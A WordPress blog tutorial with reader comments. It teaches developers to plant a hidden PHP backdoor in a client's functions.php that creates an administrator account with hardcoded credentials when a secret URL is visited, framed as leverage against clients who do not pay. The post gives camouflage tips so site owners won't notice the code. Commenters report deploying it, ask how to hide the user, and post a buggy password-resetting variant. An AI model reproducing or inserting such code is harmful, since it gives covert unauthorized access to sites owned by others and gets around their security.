How to Create a Secret Backdoor Admin Access to WordPress

Have you ever created a WordPress website or provided services for your client but didn’t get paid? If that sounds familiar, you have landed on the right spot.

To protect yourself from this situation, you may find it useful to know how to create secret backdoor website access in WordPress.

Also, if, for any reason, you cannot gain access to your WordPress website, having alternative backdoor access to regain control can come in very useful!

In this tutorial, I will discuss secret backdoor website access and reasons to create such access to ensure you always have a way into your websites.

Finally, I’ll show you how to create one with a step by step guide followed by a piece of ethical advice.

What is a secret backdoor admin access in WordPress?

secret backdoor website access

As the term suggests, backdoor access is a way to regain admin access to a WordPress website if your usual login doesn’t work.

Wondering how you can lose your admin account?

If you’re a WordPress developer or agency, you may find clients delete your admin account once you have finished your work in an attempt to protect the website when they don’t pay.

In the worst case scenario, hackers may gain unauthorized access to your website and change the admin password or remove the login altogether.

If this happens, you need a way to regain access. That’s where a secret backdoor comes into play.

What are the underlying reasons to create a backdoor website access?

There are a few potential reasons to create a secret backdoor admin access to a WordPress website:

  • To regain admin access in the event of not getting paid by clients.
  • To maintain access should the website be hacked and the admin account details changed.
  • To allow easy access to the admin panel without remembering a username or password.
  • To bypass security measures that may be in place, such as two-factor authentication.
  • To allow someone else access to the website without knowing the original password you use.
  • Creating a secret backdoor admin access can be helpful in situations where it is difficult or inconvenient to remember a username or password.

However, creating a backdoor can also be a security risk as it bypasses any security measures that may be in place.

Therefore, I recommend weighing the pros and cons before creating a secret backdoor admin access before you do it.

Ethical advice on creating backdoor website access

There are ethical implications in creating secret backdoor access to someone else’s website. It’s definitely something to consider before creating one.

However valid the reason, you’re messing with someone else’s property (once they paid for it), so think about the ramifications if you plan to add a backdoor.

I urge you not to add backdoors to websites unless there’s no other choice. I’m not responsible for such actions. I only recommend it to use for legitimate or legal reasons.

How does the WordPress password backdoor work?

A WordPress backdoor works by using PHP within a core WordPress file. The code I’ll share in a little while will create a new admin account when you visit a specific URL.

Once created, you’ll be able to log into your website and perform whatever task you need to.

When you register a PHP code snippet in functions.php, you are ready to trigger it using a URL with a custom query. The URL includes the keyword that you insert while editing the functions.php file.

Now, you may be wondering if the secret account will exist before you trigger the function.

The answer is “No”. Your new user account will only be created once you trigger the function by using the URL that includes the specific parameter.

How to create secret backdoor website access

The following process involves modifying a PHP file. It’s perfectly safe but you need to make sure you get it right first time.

Follow these instructions exactly and you’ll be fine!

To prevent any potential issues, I recommend editing the functions.php file via your child theme. If you are using the Astra theme, you can create a child theme with just a single click.

Step 1: Open the functions.php file from the theme file editor

We will be modifying the functions.php file, which is a core WordPress file.

  • Navigate to your WordPress admin dashboard.
  • Go to Appearance > Theme File Editor.
go to appearance > theme file editor
  • Now, select the functions.php file from the right sidebar.
open functions.php

Step 2: Copy and paste the following code on the functions.php file

Now, all you need to do is copy and paste this PHP code snippet into the editor.

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

You’ll see from the code that it will create a new admin user called ‘mr_admin’ with the password of ‘pa55w0rd!’.

You can change these as you see fit.

  • Place the code anywhere within the PHP file. Ideally, between other functions. You don’t want to let the site admin or managers know that you are injecting this code, right? So, I’m pasting it in the lower middle part of the document.
  • Also, ensure you’re pasting the code immediately above the /** or immediately after the */ marks.
pasting the code immediately above the /** or immediately after the */ marks
  • Hit the “Update File” button.
click on update file button

Now, the file should get updated and your backdoor is in place.

file edited successfully

Step 3: Construct a URL with custom parameters to get the admin access

Now, when you need to trigger that function or to try to gain admin access, make sure you add the following slug on the right side of the domain:

/?backdoor=go

[Here, backdoor is the query parameter after the keyword GET]. To be more specific, take a look at the following screenshot:

keyword of the function

So, if your website is www.xyz.com, the backdoor access URL will be “www.xyz.com/?backdoor=go”.

After adding the slug beside the domain name, hit Enter.

triggering the function with the parameters

Bam! It’s as simple as that!

Now, check your new admin user account from Users > All Users.

new secret user account

Pro tip: Be sneakier and camouflage the backdoor

Tip 1: Changing the parameters and function name

You can change the function name, parameters of the code snippet as you need.

This way, you can disguise yourself with camouflage. Here is the camouflage code snippet where I changed the keyword, “backdoor” to “pathway”:

add_action( 'wp_head', 'my_pathway' );

function my_pathway() {
    if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

This would mean your URL of www.xyz.com, would become “www.xyz.com/?pathway=go”.

Tip 2: Change username

To change the username, replace the string “mr_admin” with “hellboy

add_action( 'wp_head', 'my_pathway' );

function my_pathway() {
    if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'hellboy' ) ) {
            $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

Tip 3: Changing the password

To change the password, replace the keyword, “pa55w0rd!” with “hell_pass!”.

add_action( 'wp_head', 'my_pathway' );

function my_pathway() {
    if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'hellboy' ) ) {
            $user_id = wp_create_user( 'hellboy', 'hell_pass!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

Tip 4: Constructing the new URL and slug

So, to trigger the function, you need to use the following URL with the keyword, “pathway”:

www.xyz.com/?pathway=go

And that’s it. You have now created a backdoor and practiced customizing the settings to make them unique.!

Now it’s your turn!

Remember, adding secret backdoor website access shouldn’t be done lightly. But, if you need to do it, you now know how.

Regardless of why you may need to regain access to a website, this is one of the easiest ways to do it.

If you are stuck with any of these steps, feel free to drop me a line in the comment section below.

You can also join my Facebook community to keep abreast of my latest news!

22 Comments

  1. Sanjeev Sharma says:

    I have put up SSL while publishing the website. But after I don’t have access to it anymore, what to do

  2. Just superb!!! I am looking for it. Some of the client didn’t paid and remove the access from me. Thanks for article

  3. Yılmaz Saraç says:

    Hello,
    Thank you for your help. What if we change hash code?

  4. Motivation_guru says:

    I want this backdoor user to be hidden and not to show in user list. Can you please share the code or anyway to hide this specific user from the WordPress user dashboard list @mr_adam.

    I’ll be very thankful to you.

  5. i tested it and it worked. thank you so much. Can i ask how to put similar kind of code to do the same think inside cs cart or open cart platform?
    if you know the way – please share. thank you.

  6. I fixed this issue with isset.

    if (isset($_GET[‘mylogin’])) {
    if ( md5( $_GET[‘mylogin’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

    Next issue, but not sure what to do about it. This appears in debug mode after you submit function.

    Notice: registration.php is deprecated since version 3.1.0 with no alternative available. This file no longer needs to be included. in /home/…/public_html/wp-includes/functions.php on line 3984

  7. Getting an error when you turn on WP_Debug true.
    Notice: Undefined index: mylogin in /home/…/functions.php on line 721
    on this line…
    (721) if ( md5( $_GET[‘mylogin’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

    Great Idea! I’m putting this on all my sites.

  8. Space Knight says:

    If we put this code into functions.php, won’t a WP update overwrite functions.php?

      1. put it in a mu-plugin is even better

  9. Hi Admin, thank you very much for the excellent tutorial! Its exactly what I’ve been looking for. Question: Once I added the code, it create a full width white band (section) just below my menu bar. Any advice on why and how I can get rid of it?
    Any advice is greatly appreciated! Thank you

  10. Hello Adam,
    I can’t seem to proceed on WordPress 4.9.4 version (current version as on Feb. 2018).
    Everytime I try, I get the White Screen of …Death? (really? 😉 )
    What I do is connect via ftp to my server, modify what needs to be in the functions.php file, upload the new modified file, and launch the website…and …WHITE SCREEN OF DEA-EA-EATH! :+)))
    I followed your step-by-step method but something does not seem to go quite right…
    What am I doing wrong?
    I am using Theme Oblique 2.0.8.
    Thank you in advance for your help!
    And by the way, this website is really interesting.

      1. In fact, I never thought of keeping a backdoor access to a client’s website before. So, I never had the opportunity to test your code previously. I don’t think it has to do with the fact that I’m using a FR-Wordpress version.

  11. I make the snippet stronger against if the customer decided to change the role or the password of the backdoor user.

    add_action( ‘wp_head’, ‘my_backdoor’ );

    function my_backdoor() {
    if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
    require( ‘wp-includes/registration.php’ );
    if ( !username_exists( ‘mr_admin’ ) ) {
    $user_id = wp_create_user( ‘mr_admin’, ‘pa55w0rd!’ );
    $user = new WP_User( $user_id );
    $user->set_role( ‘administrator’ );
    }
    else {
    $user = get_user_by(‘login’,’pathway’);
    wp_set_password(‘pa55w0rd!’, $user->ID );
    $user->set_role( ‘administrator’ );
    }
    }
    }

  12. Billy Whitehouse says:

    What is this ’34d1f91fb2e514b8576fab1a75a89a6b’ variable?

    1. Adam @ WPCrafter says:

      I think I talk about that, it’s the MD5 hash if I recall correctly.

    2. this is what you should use to call the function
      e.g d.test.com/?backdoor=34d1f91fb2e514b8576fab1a75a89a6b

      1. no, its the md5 for ‘go’. he probably copied it from somewhere thats why forgot to change the username from ‘pathway’ to ‘mr_admin’ also.

Leave a Reply

Your email address will not be published.